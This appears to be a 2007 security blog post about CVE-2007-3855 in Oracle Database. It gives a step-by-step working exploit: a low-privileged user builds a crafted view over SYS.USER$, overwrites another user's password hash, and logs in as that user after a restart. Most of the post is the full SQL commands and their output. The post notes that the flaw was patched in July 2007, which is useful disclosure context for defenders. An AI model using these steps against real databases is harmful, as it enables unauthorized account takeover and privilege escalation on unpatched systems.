Andrea Purificato has published an [1] exploit for the Create-View-Problem (DB17 aka [2] CVE-2007-3855, bug found by Red-Database-Security). This issue was fixed with the July 2007 CPU.

The exploit updates the password hash in SYS.USER$ via a specially crafted view. But the exploit from Andrea does not work without additional steps because it is not supported to modify password hashes via an update command.

Example:
– We calculate the password hashes for the user RDS and the passwords RDS and HACKED with the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

– Now we connect to the database and update the password hash via a specially crafted view.

SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;

View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS’;

1 row updated.

SQL> commit;

Commit complete.

– The password is now changed to HACKED.

SQL> select password from sys.user$ where name=’RDS’;

PASSWORD
——————————
7B843A192FF96BE9

– But the connect attempt throws an error message…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

– To activate the password change it is necessary to restart the database.

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle. All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>